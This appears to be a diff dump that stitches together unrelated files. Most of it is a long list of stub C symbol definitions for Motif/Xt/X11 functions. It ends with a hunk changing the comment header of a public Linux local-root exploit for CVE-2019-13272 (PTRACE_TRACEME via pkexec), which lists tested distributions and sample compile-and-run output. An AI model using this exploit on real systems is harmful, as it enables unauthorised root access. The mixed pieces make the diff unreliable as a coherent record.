|
||||
int XmTextFieldSetHighlight = 0;
|
||||
int XmTextFieldSetInsertionPosition = 0;
|
||||
int XmTextFieldSetMaxLength = 0;
|
||||
int _XmTextFieldSetSel2 = 0;
|
||||
int XmTextFieldSetSelection = 0;
|
||||
int XmTextFieldSetString = 0;
|
||||
int XmTextFieldSetStringWcs = 0;
|
||||
int XmTextFieldShowPosition = 0;
|
||||
int _XmTextFieldStartSelection = 0;
|
||||
int xmTextFieldWidgetClass = 0;
|
||||
int XmTextFieldXYToPos = 0;
|
||||
int _XmTextFindLineEnd = 0;
|
||||
int _XmTextFindScroll = 0;
|
||||
int XmTextFindString = 0;
|
||||
int _XmTextFindStringBackwards = 0;
|
||||
int _XmTextFindStringForwards = 0;
|
||||
int XmTextFindStringWcs = 0;
|
||||
int _XmTextFPrimClassExtRec = 0;
|
||||
int _XmTextFreeContextData = 0;
|
||||
int _XmTextFToggleCursorGC = 0;
|
||||
int XmTextGetAddMode = 0;
|
||||
int _XmTextGetAnchor = 0;
|
||||
int XmTextGetBaseline = 0;
|
||||
int _XmTextGetBaseLine = 0;
|
||||
int XmTextGetBaseLine = 0;
|
||||
int _XmTextGetBaselines = 0;
|
||||
int XmTextGetCenterline = 0;
|
||||
int XmTextGetCursorPosition = 0;
|
||||
int _XmTextGetDisplayRect = 0;
|
||||
int _XmTextGetDropReciever = 0;
|
||||
int XmTextGetEditable = 0;
|
||||
int XmTextGetInsertionPosition = 0;
|
||||
int XmTextGetLastPosition = 0;
|
||||
int _XmTextGetLineTable = 0;
|
||||
int XmTextGetMaxLength = 0;
|
||||
int _XmTextGetNumberLines = 0;
|
||||
int _XmTextGetSel2 = 0;
|
||||
int XmTextGetSelection = 0;
|
||||
int XmTextGetSelectionPosition = 0;
|
||||
int XmTextGetSelectionWcs = 0;
|
||||
int XmTextGetSource = 0;
|
||||
int XmTextGetString = 0;
|
||||
int XmTextGetStringWcs = 0;
|
||||
int XmTextGetSubstring = 0;
|
||||
int XmTextGetSubstringWcs = 0;
|
||||
int _XmTextGetTableIndex = 0;
|
||||
int XmTextGetTopCharacter = 0;
|
||||
int _XmTextGetTotalLines = 0;
|
||||
int _XmTextHandleSecondaryFinished = 0;
|
||||
int _XmTextHasDestination = 0;
|
||||
int _XmTextInputCreate = 0;
|
||||
int _XmTextInputGetSecResData = 0;
|
||||
int XmTextInsert = 0;
|
||||
int XmTextInsertWcs = 0;
|
||||
int _XmTextInstallTransferTrait = 0;
|
||||
int _XmTextInvalidate = 0;
|
||||
int _XmTextIn_XmTextEventBindings1 = 0;
|
||||
int _XmTextIn_XmTextEventBindings2 = 0;
|
||||
int _XmTextIn_XmTextEventBindings3 = 0;
|
||||
int _XmTextIn_XmTextVEventBindings = 0;
|
||||
int _XmTextLineInfo = 0;
|
||||
int _XmTextLoseSelection = 0;
|
||||
int _XmTextMarginsProc = 0;
|
||||
int _XmTextMarkRedraw = 0;
|
||||
int _XmTextModifyVerify = 0;
|
||||
int _XmTextMovingCursorPosition = 0;
|
||||
int _XmTextNeedsPendingDeleteDis = 0;
|
||||
int _XmTextNumLines = 0;
|
||||
int _XmTextOutLoadGCsAndRecolorCursors = 0;
|
||||
int _XmTextOutputCreate = 0;
|
||||
int _XmTextOutputGetSecResData = 0;
|
||||
int XmTextPaste = 0;
|
||||
int XmTextPasteLink = 0;
|
||||
int _XmTextPosToLine = 0;
|
||||
int XmTextPosToXY = 0;
|
||||
int _XmTextPrimClassExtRec = 0;
|
||||
int _XmTextRealignLineTable = 0;
|
||||
int XmTextRemove = 0;
|
||||
int _XmTextReplace = 0;
|
||||
int XmTextReplace = 0;
|
||||
int XmTextReplaceWcs = 0;
|
||||
int _XmTextResetClipOrigin = 0;
|
||||
int _XmTextResetIC = 0;
|
||||
int XmTextScroll = 0;
|
||||
int _XmTextScrollable = 0;
|
||||
int XmTextSetAddMode = 0;
|
||||
int _XmTextSetCursorPosition = 0;
|
||||
int XmTextSetCursorPosition = 0;
|
||||
int _XmTextSetDestinationSelection = 0;
|
||||
int _XmTextSetEditable = 0;
|
||||
int XmTextSetEditable = 0;
|
||||
int _XmTextSetHighlight = 0;
|
||||
int XmTextSetHighlight = 0;
|
||||
int XmTextSetInsertionPosition = 0;
|
||||
int XmTextSetMaxLength = 0;
|
||||
int _XmTextSetPreeditPosition = 0;
|
||||
int _XmTextSetSel2 = 0;
|
||||
int XmTextSetSelection = 0;
|
||||
int XmTextSetSource = 0;
|
||||
int XmTextSetString = 0;
|
||||
int XmTextSetStringWcs = 0;
|
||||
int _XmTextSetTopCharacter = 0;
|
||||
int XmTextSetTopCharacter = 0;
|
||||
int _XmTextShouldWordWrap = 0;
|
||||
int _XmTextShowPosition = 0;
|
||||
int XmTextShowPosition = 0;
|
||||
int _XmTextToggleCursorGC = 0;
|
||||
int _XmTextToLocaleText = 0;
|
||||
int _XmTextUpdateLineTable = 0;
|
||||
int _XmTextValidate = 0;
|
||||
int _XmTextValueChanged = 0;
|
||||
int xmTextWidgetClass = 0;
|
||||
int XmTextXYToPos = 0;
|
||||
int _XmToggleBCacheCompare = 0;
|
||||
int _XmToggleB_defaultTranslations = 0;
|
||||
int _XmToggleBGadClassExtRec = 0;
|
||||
int _XmToggleB_menuTranslations = 0;
|
||||
int _XmToggleBPrimClassExtRec = 0;
|
||||
int xmToggleButtonClassRec = 0;
|
||||
int xmToggleButtonGadgetClass = 0;
|
||||
int xmToggleButtonGadgetClassRec = 0;
|
||||
int XmToggleButtonGadgetGetState = 0;
|
||||
int XmToggleButtonGadgetSetState = 0;
|
||||
int XmToggleButtonGadgetSetValue = 0;
|
||||
int xmToggleButtonGCacheObjClassRec = 0;
|
||||
int XmToggleButtonGetState = 0;
|
||||
int XmToggleButtonSetState = 0;
|
||||
int XmToggleButtonSetValue = 0;
|
||||
int xmToggleButtonWidgetClass = 0;
|
||||
int _XmToHorizontalPixels = 0;
|
||||
int _XmToLayoutDirection = 0;
|
||||
int _XmToolTipEnter = 0;
|
||||
int XmToolTipGetLabel = 0;
|
||||
int _XmToolTipLeave = 0;
|
||||
int _XmToolTipRemove = 0;
|
||||
int _XmToPanedPixels = 0;
|
||||
int _XmTopShadowColorDefault = 0;
|
||||
int _XmTopShadowPixmapDefault = 0;
|
||||
int _XmToVerticalPixels = 0;
|
||||
int XmTrackingEvent = 0;
|
||||
int XmTrackingLocate = 0;
|
||||
int _XmTrackShellFocus = 0;
|
||||
int XmTransferDone = 0;
|
||||
int _XmTransferGetDestinationCBStruct = 0;
|
||||
int XmTransferSendRequest = 0;
|
||||
int XmTransferSetParameters = 0;
|
||||
int XmTransferStartRequest = 0;
|
||||
int XmTransferValue = 0;
|
||||
int _XmTransformSubResources = 0;
|
||||
int XmTranslateKey = 0;
|
||||
int _XmTraverse = 0;
|
||||
int _XmTraverseAway = 0;
|
||||
int _XmTraverseDown = 0;
|
||||
int _XmTraverseHome = 0;
|
||||
int _XmTraverseLeft = 0;
|
||||
int _XmTraverseNext = 0;
|
||||
int _XmTraverseNextTabGroup = 0;
|
||||
int _XmTraversePrev = 0;
|
||||
int _XmTraversePrevTabGroup = 0;
|
||||
int _XmTraverseRight = 0;
|
||||
int _XmTraverseUp = 0;
|
||||
int _XmTravGraphAdd = 0;
|
||||
int _XmTravGraphRemove = 0;
|
||||
int _XmTravGraphUpdate = 0;
|
||||
int xmTreeClassRec = 0;
|
||||
int xmTreeWidgetClass = 0;
|
||||
int XmuNCopyISOLatin1Lowered = 0;
|
||||
int _XmUnhighlightBorder = 0;
|
||||
int XmUninstallImage = 0;
|
||||
int _XmUnitTypeDefault = 0;
|
||||
int XmUpdateDisplay = 0;
|
||||
int _XmUseColorObj = 0;
|
||||
int xmUseVersion = 0;
|
||||
int _XmUtf8ToUcs2 = 0;
|
||||
int _XmUtilIsSubclassByNameQ = 0;
|
||||
int XmVaCreateArrowButton = 0;
|
||||
int XmVaCreateArrowButtonGadget = 0;
|
||||
int XmVaCreateBulletinBoard = 0;
|
||||
int XmVaCreateButtonBox = 0;
|
||||
int XmVaCreateCascadeButton = 0;
|
||||
int XmVaCreateCascadeButtonGadget = 0;
|
||||
int XmVaCreateColorSelector = 0;
|
||||
int XmVaCreateColumn = 0;
|
||||
int XmVaCreateCombinationBox2 = 0;
|
||||
int XmVaCreateComboBox = 0;
|
||||
int XmVaCreateCommand = 0;
|
||||
int XmVaCreateContainer = 0;
|
||||
int XmVaCreateDataField = 0;
|
||||
int XmVaCreateDrawingArea = 0;
|
||||
int XmVaCreateDrawnButton = 0;
|
||||
int XmVaCreateDropDown = 0;
|
||||
int XmVaCreateExt18List = 0;
|
||||
int XmVaCreateFileSelectionBox = 0;
|
||||
int XmVaCreateForm = 0;
|
||||
int XmVaCreateFrame = 0;
|
||||
int XmVaCreateIconGadget = 0;
|
||||
int XmVaCreateLabel = 0;
|
||||
int XmVaCreateLabelGadget = 0;
|
||||
int XmVaCreateList = 0;
|
||||
int XmVaCreateMainWindow = 0;
|
||||
int XmVaCreateManagedArrowButton = 0;
|
||||
int XmVaCreateManagedArrowButtonGadget = 0;
|
||||
int XmVaCreateManagedBulletinBoard = 0;
|
||||
int XmVaCreateManagedButtonBox = 0;
|
||||
int XmVaCreateManagedCascadeButton = 0;
|
||||
int XmVaCreateManagedCascadeButtonGadget = 0;
|
||||
int XmVaCreateManagedColorSelector = 0;
|
||||
int XmVaCreateManagedColumn = 0;
|
||||
int XmVaCreateManagedCombinationBox2 = 0;
|
||||
int XmVaCreateManagedComboBox = 0;
|
||||
int XmVaCreateManagedCommand = 0;
|
||||
int XmVaCreateManagedContainer = 0;
|
||||
int XmVaCreateManagedDataField = 0;
|
||||
int XmVaCreateManagedDrawingArea = 0;
|
||||
int XmVaCreateManagedDrawnButton = 0;
|
||||
int XmVaCreateManagedDropDown = 0;
|
||||
int XmVaCreateManagedExt18List = 0;
|
||||
int XmVaCreateManagedFileSelectionBox = 0;
|
||||
int XmVaCreateManagedForm = 0;
|
||||
int XmVaCreateManagedFrame = 0;
|
||||
int XmVaCreateManagedIconGadget = 0;
|
||||
int XmVaCreateManagedLabel = 0;
|
||||
int XmVaCreateManagedLabelGadget = 0;
|
||||
int XmVaCreateManagedList = 0;
|
||||
int XmVaCreateManagedMainWindow = 0;
|
||||
int XmVaCreateManagedMessageBox = 0;
|
||||
int XmVaCreateManagedMultiList = 0;
|
||||
int XmVaCreateManagedNotebook = 0;
|
||||
int XmVaCreateManagedPanedWindow = 0;
|
||||
int XmVaCreateManagedPushButton = 0;
|
||||
int XmVaCreateManagedPushButtonGadget = 0;
|
||||
int XmVaCreateManagedRowColumn = 0;
|
||||
int XmVaCreateManagedScale = 0;
|
||||
int XmVaCreateManagedScrollBar = 0;
|
||||
int XmVaCreateManagedScrolledWindow = 0;
|
||||
int XmVaCreateManagedSelectionBox = 0;
|
||||
int XmVaCreateManagedSeparator = 0;
|
||||
int XmVaCreateManagedSeparatorGadget = 0;
|
||||
int XmVaCreateManagedSimpleSpinBox = 0;
|
||||
int XmVaCreateManagedSpinBox = 0;
|
||||
int XmVaCreateManagedTabStack = 0;
|
||||
int XmVaCreateManagedText = 0;
|
||||
int XmVaCreateManagedTextField = 0;
|
||||
int XmVaCreateManagedToggleButton = 0;
|
||||
int XmVaCreateManagedToggleButtonGadget = 0;
|
||||
int XmVaCreateMessageBox = 0;
|
||||
int XmVaCreateMultiList = 0;
|
||||
int XmVaCreateNotebook = 0;
|
||||
int XmVaCreatePanedWindow = 0;
|
||||
int XmVaCreatePushButton = 0;
|
||||
int XmVaCreatePushButtonGadget = 0;
|
||||
int XmVaCreateRowColumn = 0;
|
||||
int XmVaCreateScale = 0;
|
||||
int XmVaCreateScrollBar = 0;
|
||||
int XmVaCreateScrolledWindow = 0;
|
||||
int XmVaCreateSelectionBox = 0;
|
||||
int XmVaCreateSeparator = 0;
|
||||
int XmVaCreateSeparatorGadget = 0;
|
||||
int XmVaCreateSimpleCheckBox = 0;
|
||||
int XmVaCreateSimpleMenuBar = 0;
|
||||
int XmVaCreateSimpleOptionMenu = 0;
|
||||
int XmVaCreateSimplePopupMenu = 0;
|
||||
int XmVaCreateSimplePulldownMenu = 0;
|
||||
int XmVaCreateSimpleRadioBox = 0;
|
||||
int XmVaCreateSimpleSpinBox = 0;
|
||||
int XmVaCreateSpinBox = 0;
|
||||
int XmVaCreateTabStack = 0;
|
||||
int XmVaCreateText = 0;
|
||||
int XmVaCreateTextField = 0;
|
||||
int XmVaCreateToggleButton = 0;
|
||||
int XmVaCreateToggleButtonGadget = 0;
|
||||
int _XmValidateFocus = 0;
|
||||
int _XmValidCursorIconQuark = 0;
|
||||
int _XmValidTimestamp = 0;
|
||||
int _XmVaToTypedArgList = 0;
|
||||
int _XmVendorExtRealize = 0;
|
||||
int xmVendorShellExtClassRec = 0;
|
||||
int xmVendorShellExtObjectClass = 0;
|
||||
int _XmVersionString = 0;
|
||||
int _XmVirtKeys_acornFallbackBindingString = 0;
|
||||
int _XmVirtKeys_apolloFallbackBindingString = 0;
|
||||
int _XmVirtKeys_dblclkFallbackBindingString = 0;
|
||||
int _XmVirtKeys_decFallbackBindingString = 0;
|
||||
int _XmVirtKeysDestroy = 0;
|
||||
int _XmVirtKeys_dgFallbackBindingString = 0;
|
||||
int _XmVirtKeys_fallbackBindingString = 0;
|
||||
int _XmVirtKeysHandler = 0;
|
||||
int _XmVirtKeys_hpFallbackBindingString = 0;
|
||||
int _XmVirtKeys_ibmFallbackBindingString = 0;
|
||||
int _XmVirtKeys_ingrFallbackBindingString = 0;
|
||||
int _XmVirtKeysInitialize = 0;
|
||||
int _XmVirtKeysLoadFallbackBindings = 0;
|
||||
int _XmVirtKeysLoadFileBindings = 0;
|
||||
int _XmVirtKeys_megatekFallbackBindingString = 0;
|
||||
int _XmVirtKeys_motorolaFallbackBindingString = 0;
|
||||
int _XmVirtKeys_sgiFallbackBindingString = 0;
|
||||
int _XmVirtKeys_siemens9733FallbackBindingString = 0;
|
||||
int _XmVirtKeys_siemensWx200FallbackBindingString = 0;
|
||||
int _XmVirtKeys_sunFallbackBindingString = 0;
|
||||
int _XmVirtKeys_tekFallbackBindingString = 0;
|
||||
int _XmVirtualToActualKeysym = 0;
|
||||
int _XmWarning = 0;
|
||||
int _XmWarningMsg = 0;
|
||||
int _XmWhitePixel = 0;
|
||||
int _XmWidgetFocusChange = 0;
|
||||
int XmWidgetGetBaselines = 0;
|
||||
int XmWidgetGetDisplayRect = 0;
|
||||
int _XmWidgetIsTraversable = 0;
|
||||
int xmWorldClass = 0;
|
||||
int xmWorldClassRec = 0;
|
||||
int xmWorldObjectClass = 0;
|
||||
int _XmWriteDragBuffer = 0;
|
||||
int _XmWriteDSToStream = 0;
|
||||
int _XmWriteInitiatorInfo = 0;
|
||||
int _XmXftDrawCreate = 0;
|
||||
int _XmXftDrawDestroy = 0;
|
||||
int _XmXftDrawString = 0;
|
||||
int _XmXftDrawString2 = 0;
|
||||
int _XmXftFontAverageWidth = 0;
|
||||
int _XmXftGetXftColor = 0;
|
||||
int _XmXftSetClipRectangles = 0;
|
||||
int _Xmxpmatoui = 0;
|
||||
int _XmxpmColorKeys = 0;
|
||||
int _XmxpmCreateImageFromPixmap = 0;
|
||||
int _XmxpmCreatePixmapFromImage = 0;
|
||||
int _XmxpmDataTypes = 0;
|
||||
int _XmxpmFreeColorTable = 0;
|
||||
int _XmxpmFreeRgbNames = 0;
|
||||
int _XmxpmGetCmt = 0;
|
||||
int _XmxpmGetRgbName = 0;
|
||||
int _XmxpmGetString = 0;
|
||||
int _XmxpmHashIntern = 0;
|
||||
int _XmxpmHashSlot = 0;
|
||||
int _XmxpmHashTableFree = 0;
|
||||
int _XmxpmHashTableInit = 0;
|
||||
int _XmxpmInitAttributes = 0;
|
||||
int _XmxpmInitXpmImage = 0;
|
||||
int _XmxpmInitXpmInfo = 0;
|
||||
int _XmxpmNextString = 0;
|
||||
int _XmxpmNextUI = 0;
|
||||
int _XmxpmNextWord = 0;
|
||||
int _XmxpmParseColors = 0;
|
||||
int _XmxpmParseData = 0;
|
||||
int _XmxpmParseDataAndCreate = 0;
|
||||
int _XmxpmParseExtensions = 0;
|
||||
int _XmxpmParseHeader = 0;
|
||||
int _XmxpmParseValues = 0;
|
||||
int _XmxpmReadRgbNames = 0;
|
||||
int _XmxpmSetAttributes = 0;
|
||||
int _XmxpmSetInfo = 0;
|
||||
int _XmxpmSetInfoMask = 0;
|
||||
int _Xmxpm_xynormalizeimagebits = 0;
|
||||
int _Xmxpm_znormalizeimagebits = 0;
|
||||
int XNextEvent = 0;
|
||||
int XOffsetRegion = 0;
|
||||
int XOMOfOC = 0;
|
||||
int XOpenDisplay = 0;
|
||||
int XOpenIM = 0;
|
||||
int XParseColor = 0;
|
||||
int XPeekEvent = 0;
|
||||
int XPending = 0;
|
||||
int Xpms_popen = 0;
|
||||
int XPolygonRegion = 0;
|
||||
int XPutBackEvent = 0;
|
||||
int XPutImage = 0;
|
||||
int XQueryBestCursor = 0;
|
||||
int XQueryColor = 0;
|
||||
int XQueryColors = 0;
|
||||
int XQueryPointer = 0;
|
||||
int XQueryTree = 0;
|
||||
int XRaiseWindow = 0;
|
||||
int XReadBitmapFileData = 0;
|
||||
int XRecolorCursor = 0;
|
||||
int XRectInRegion = 0;
|
||||
int XReparentWindow = 0;
|
||||
int XrmCombineDatabase = 0;
|
||||
int XrmDestroyDatabase = 0;
|
||||
int XrmGetStringDatabase = 0;
|
||||
int XrmPermStringToQuark = 0;
|
||||
int XrmPutResource = 0;
|
||||
int XrmPutStringResource = 0;
|
||||
int XrmQGetResource = 0;
|
||||
int XrmQGetSearchList = 0;
|
||||
int XrmQGetSearchResource = 0;
|
||||
int XrmQuarkToString = 0;
|
||||
int XrmStringToQuark = 0;
|
||||
int XrmUniqueQuark = 0;
|
||||
int XRotateBuffers = 0;
|
||||
int XSaveContext = 0;
|
||||
int XScreenCount = 0;
|
||||
int XScreenNumberOfScreen = 0;
|
||||
int XScreenOfDisplay = 0;
|
||||
int XSelectInput = 0;
|
||||
int XSendEvent = 0;
|
||||
int XSetClipMask = 0;
|
||||
int XSetClipOrigin = 0;
|
||||
int XSetClipRectangles = 0;
|
||||
int XSetCloseDownMode = 0;
|
||||
int XSetErrorHandler = 0;
|
||||
int XSetFillStyle = 0;
|
||||
int XSetForeground = 0;
|
||||
int XSetFunction = 0;
|
||||
int XSetICFocus = 0;
|
||||
int XSetICValues = 0;
|
||||
int XSetInputFocus = 0;
|
||||
int XSetLineAttributes = 0;
|
||||
int XSetLocaleModifiers = 0;
|
||||
int XSetOCValues = 0;
|
||||
int XSetRegion = 0;
|
||||
int XSetSelectionOwner = 0;
|
||||
int XSetStipple = 0;
|
||||
int XSetTextProperty = 0;
|
||||
int XSetTSOrigin = 0;
|
||||
int XSetWindowBackground = 0;
|
||||
int XSetWindowBackgroundPixmap = 0;
|
||||
int XSetWMColormapWindows = 0;
|
||||
int XShapeCombineMask = 0;
|
||||
int XShapeCombineRectangles = 0;
|
||||
int XShapeQueryExtension = 0;
|
||||
int __xstat64 = 0;
|
||||
int XStoreBuffer = 0;
|
||||
int XStoreColor = 0;
|
||||
int XStringToKeysym = 0;
|
||||
int XSubtractRegion = 0;
|
||||
int XSync = 0;
|
||||
int XtAddCallback = 0;
|
||||
int XtAddEventHandler = 0;
|
||||
int XtAddGrab = 0;
|
||||
int XtAddRawEventHandler = 0;
|
||||
int XtAllocateGC = 0;
|
||||
int XtAppAddTimeOut = 0;
|
||||
int XtAppAddWorkProc = 0;
|
||||
int XtAppCreateShell = 0;
|
||||
int XtAppErrorMsg = 0;
|
||||
int XtAppGetExitFlag = 0;
|
||||
int XtAppGetSelectionTimeout = 0;
|
||||
int XtAppLock = 0;
|
||||
int XtAppNextEvent = 0;
|
||||
int XtAppPending = 0;
|
||||
int XtAppProcessEvent = 0;
|
||||
int XtAppSetSelectionTimeout = 0;
|
||||
int XtAppSetTypeConverter = 0;
|
||||
int XtAppSetWarningMsgHandler = 0;
|
||||
int XtAppUnlock = 0;
|
||||
int XtAppWarningMsg = 0;
|
||||
int XtAugmentTranslations = 0;
|
||||
int XtBuildEventMask = 0;
|
||||
int XtCallActionProc = 0;
|
||||
int XtCallCallbackList = 0;
|
||||
int XtCallCallbacks = 0;
|
||||
int XtCallConverter = 0;
|
||||
int XtCalloc = 0;
|
||||
int XtCancelSelectionRequest = 0;
|
||||
int XtConfigureWidget = 0;
|
||||
int XtConvertAndStore = 0;
|
||||
int XtConvertCase = 0;
|
||||
int XtCreateManagedWidget = 0;
|
||||
int XtCreatePopupShell = 0;
|
||||
int XtCreateSelectionRequest = 0;
|
||||
int XtCreateWidget = 0;
|
||||
int XtCreateWindow = 0;
|
||||
int XtCvtStringToFontSet = 0;
|
||||
int XtCvtStringToFontStruct = 0;
|
||||
int XtCvtStringToPixel = 0;
|
||||
int XtDatabase = 0;
|
||||
int XtDestroyApplicationContext = 0;
|
||||
int XtDestroyWidget = 0;
|
||||
int XtDisownSelection = 0;
|
||||
int XtDispatchEvent = 0;
|
||||
int XtDisplayOfObject = 0;
|
||||
int XtDisplayStringConversionWarning = 0;
|
||||
int XtDisplayToApplicationContext = 0;
|
||||
int XtError = 0;
|
||||
int XtErrorMsg = 0;
|
||||
int XTextExtents = 0;
|
||||
int XTextExtents16 = 0;
|
||||
int XTextWidth = 0;
|
||||
int XTextWidth16 = 0;
|
||||
int XtFree = 0;
|
||||
int XtGetActionKeysym = 0;
|
||||
int XtGetApplicationNameAndClass = 0;
|
||||
int XtGetApplicationResources = 0;
|
||||
int XtGetConstraintResourceList = 0;
|
||||
int XtGetErrorDatabaseText = 0;
|
||||
int XtGetGC = 0;
|
||||
int XtGetKeysymTable = 0;
|
||||
int XtGetMultiClickTime = 0;
|
||||
int XtGetResourceList = 0;
|
||||
int XtGetSelectionParameters = 0;
|
||||
int XtGetSelectionRequest = 0;
|
||||
int XtGetSelectionValue = 0;
|
||||
int XtGetSelectionValueIncremental = 0;
|
||||
int XtGetSelectionValues = 0;
|
||||
int XtGetSelectionValuesIncremental = 0;
|
||||
int XtGetSubresources = 0;
|
||||
int XtGetSubvalues = 0;
|
||||
int XtGetValues = 0;
|
||||
int XtGrabButton = 0;
|
||||
int XtGrabKey = 0;
|
||||
int XtGrabKeyboard = 0;
|
||||
int XtGrabPointer = 0;
|
||||
int XtHasCallbacks = 0;
|
||||
int _XtInherit = 0;
|
||||
int _XtInheritTranslations = 0;
|
||||
int XtInitializeWidgetClass = 0;
|
||||
int XtInsertEventHandler = 0;
|
||||
int XtInstallAccelerators = 0;
|
||||
int XtIsManaged = 0;
|
||||
int XtIsSensitive = 0;
|
||||
int XtIsSubclass = 0;
|
||||
int _XtIsSubclassOf = 0;
|
||||
int XtLastEventProcessed = 0;
|
||||
int XtLastTimestampProcessed = 0;
|
||||
int XtMakeGeometryRequest = 0;
|
||||
int XtMakeResizeRequest = 0;
|
||||
int XtMalloc = 0;
|
||||
int XtManageChild = 0;
|
||||
int XtManageChildren = 0;
|
||||
int XtMergeArgLists = 0;
|
||||
int XtMoveWidget = 0;
|
||||
int XtName = 0;
|
||||
int XtNameToWidget = 0;
|
||||
int XtOverrideTranslations = 0;
|
||||
int XtOwnSelection = 0;
|
||||
int XtOwnSelectionIncremental = 0;
|
||||
int XtParseAcceleratorTable = 0;
|
||||
int XtParseTranslationTable = 0;
|
||||
int XtPopdown = 0;
|
||||
int XtPopup = 0;
|
||||
int XtProcessLock = 0;
|
||||
int XtProcessUnlock = 0;
|
||||
int XtQueryGeometry = 0;
|
||||
int XTranslateCoordinates = 0;
|
||||
int XtRealizeWidget = 0;
|
||||
int XtRealloc = 0;
|
||||
int XtRegisterGrabAction = 0;
|
||||
int XtReleaseGC = 0;
|
||||
int XtRemoveAllCallbacks = 0;
|
||||
int XtRemoveCallback = 0;
|
||||
int XtRemoveEventHandler = 0;
|
||||
int XtRemoveGrab = 0;
|
||||
int XtRemoveTimeOut = 0;
|
||||
int XtRemoveWorkProc = 0;
|
||||
int XtResizeWidget = 0;
|
||||
int XtResolvePathname = 0;
|
||||
int XtScreenDatabase = 0;
|
||||
int XtScreenOfObject = 0;
|
||||
int XtSendSelectionRequest = 0;
|
||||
int XtSetKeyboardFocus = 0;
|
||||
int XtSetKeyTranslator = 0;
|
||||
int XtSetMappedWhenManaged = 0;
|
||||
int XtSetSelectionParameters = 0;
|
||||
int XtSetSensitive = 0;
|
||||
int XtSetSubvalues = 0;
|
||||
int XtSetTypeConverter = 0;
|
||||
int XtSetValues = 0;
|
||||
int XtShellStrings = 0;
|
||||
int XtStrings = 0;
|
||||
int XtTranslateCoords = 0;
|
||||
int XtTranslateKey = 0;
|
||||
int XtUngrabButton = 0;
|
||||
int XtUngrabKey = 0;
|
||||
int XtUngrabKeyboard = 0;
|
||||
int XtUngrabPointer = 0;
|
||||
int XtUnmanageChild = 0;
|
||||
int XtUnmanageChildren = 0;
|
||||
int XtVaCreateManagedWidget = 0;
|
||||
int XtVaCreateWidget = 0;
|
||||
int XtVaGetValues = 0;
|
||||
int XtVaSetValues = 0;
|
||||
int XtWarning = 0;
|
||||
int XtWarningMsg = 0;
|
||||
int XtWidgetToApplicationContext = 0;
|
||||
int XtWindowOfObject = 0;
|
||||
int XtWindowToWidget = 0;
|
||||
int XUngrabKeyboard = 0;
|
||||
int XUngrabPointer = 0;
|
||||
int XUngrabServer = 0;
|
||||
int XUnionRectWithRegion = 0;
|
||||
int XUnionRegion = 0;
|
||||
int XUnmapWindow = 0;
|
||||
int XUnsetICFocus = 0;
|
||||
int Xutf8DrawImageString = 0;
|
||||
int Xutf8DrawString = 0;
|
||||
int Xutf8TextEscapement = 0;
|
||||
int Xutf8TextExtents = 0;
|
||||
int Xutf8TextListToTextProperty = 0;
|
||||
int XVaCreateNestedList = 0;
|
||||
int XWarpPointer = 0;
|
||||
int XwcDrawImageString = 0;
|
||||
int XwcDrawString = 0;
|
||||
int XwcTextEscapement = 0;
|
||||
int XwcTextExtents = 0;
|
||||
int XWidthOfScreen = 0;
|
||||
int XWindowEvent = 0;
|
||||
int XWithdrawWindow = 0;
|
||||
int overrideShellWidgetClass = 0;
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,5 +1,10 @@
|
||||
// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
|
||||
// Uses pkexec technique
|
||||
//
|
||||
// Uses pkexec technique. Requires execution within the context
|
||||
// of a user session with an active PolKit agent.
|
||||
//
|
||||
// Exploitation will fail if kernel.yama.ptrace_scope >= 2;
|
||||
// or SELinux deny_ptrace=on.
|
||||
// ---
|
||||
// Original discovery and exploit author: Jann Horn
|
||||
// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
|
||||
@@ -14,6 +19,7 @@
|
||||
// Tested on:
|
||||
// - Ubuntu 16.04.5 kernel 4.15.0-29-generic
|
||||
// - Ubuntu 18.04.1 kernel 4.15.0-20-generic
|
||||
// - Ubuntu 18.04.3 kernel 5.0.0-23-generic
|
||||
// - Ubuntu 19.04 kernel 5.0.0-15-generic
|
||||
// - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
|
||||
// - Linux Mint 17.3 kernel 4.4.0-89-generic
|
||||
@@ -24,33 +30,37 @@
|
||||
// - Backbox 6 kernel 4.18.0-21-generic
|
||||
// - Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
|
||||
// - Kali kernel 4.19.0-kali5-amd64
|
||||
// - Redcore 1806 (LXQT) kernel 4.16.16-redcore
|
||||
// - MX 18.3 kernel 4.19.37-2~mx17+1
|
||||
// - RHEL 8.0 kernel 4.18.0-80.el8.x86_64
|
||||
// - CentOS 8 kernel 4.18.0-80.el8.x86_64
|
||||
// - Debian 9.4.0 kernel 4.9.0-6-amd64
|
||||
// - Debian 10.0.0 kernel 4.19.0-5-amd64
|
||||
// - Devuan 2.0.0 kernel 4.9.0-6-amd64
|
||||
// - SparkyLinux 5.8 kernel 4.19.0-5-amd64
|
||||
// - SparkyLinux 5.9 kernel 4.19.0-6-amd64
|
||||
// - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
|
||||
// - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
|
||||
// - Mageia 6 kernel 4.9.35-desktop-1.mga6
|
||||
// - Antergos 18.7 kernel 4.17.6-1-ARCH
|
||||
// - lubuntu 19.04 kernel 5.0.0-13-generic
|
||||
// - Sabayon 19.03 kernel 4.20.0-sabayon
|
||||
// - Pop! OS 19.04 kernel 5.0.0-21-generic
|
||||
// ---
|
||||
// user@linux-mint-19-2:~$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root
|
||||
// user@linux-mint-19-2:~$ ./ptrace_traceme_root
|
||||
// [user@localhost CVE-2019-13272]$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root
|
||||
// [user@localhost CVE-2019-13272]$ ./ptrace_traceme_root
|
||||
// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
|
||||
// [.] Checking environment ...
|
||||
// [~] Done, looks good
|
||||
// [.] Searching for known helpers ...
|
||||
// [~] Found known helper: /usr/sbin/mate-power-backlight-helper
|
||||
// [.] Using helper: /usr/sbin/mate-power-backlight-helper
|
||||
// [.] Searching policies for useful helpers ...
|
||||
// [.] Ignoring helper (does not exist): /usr/sbin/pk-device-rebind
|
||||
// [.] Trying helper: /usr/libexec/gsd-backlight-helper
|
||||
// [.] Spawning suid process (/usr/bin/pkexec) ...
|
||||
// [.] Tracing midpid ...
|
||||
// [~] Attached to midpid
|
||||
// To run a command as administrator (user "root"), use "sudo <command>".
|
||||
// See "man sudo_root" for details.
|
||||
//
|
||||
